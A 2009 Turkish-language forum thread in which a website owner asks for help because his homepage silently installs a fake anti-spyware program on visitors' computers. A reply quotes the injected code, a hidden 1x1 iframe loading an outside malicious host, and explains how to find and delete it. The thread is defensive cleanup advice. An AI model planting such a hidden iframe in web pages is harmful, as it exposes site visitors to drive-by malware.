Sitemde Virüs var
7
●455
- 15-08-2009, 13:10:37s.a arkadaşlar siteme bir virüs bulaşmış anasayfaya girince araçcubugunun altında birşey cıkyor ne oldugunu anlamadan hemen bilgisayara anti spyware die bi virüs yüklüyor.fakat okadar aramama ragmen o kodu bulamadım.anasayfaya saq tıklayıp iframe diye aratıyorum kod var ama defaul.asp bilgisayarıma indirip iframe die aratıyorum kod yok :S adres burası http://www.eceerken.gen.tr lütfen yardımcı olun benim için sorun yok ama okadar kişi bu siteye girior adamların bilgisayarına virüs bulaşır ve onların hakkını yemiş olurum.
- 15-08-2009, 15:23:16dreamwear kullanıyorsan bütün dosyalarda aşağıdaki kodu araştırıp sil ve ftp ye gönder temiz dosyaları.
<iframe src="http://updeit.com/" width="1" height="1"></iframe>
Veya index.asp dosyanı aç bu kodu ara eğer bulamadıysan include olan dosyalrıda tek tek araştır js dahil.
siteden bakın iframe var ama default asp de aratınca yok :S.sam3t yinede ilgi ve alakan için tşkler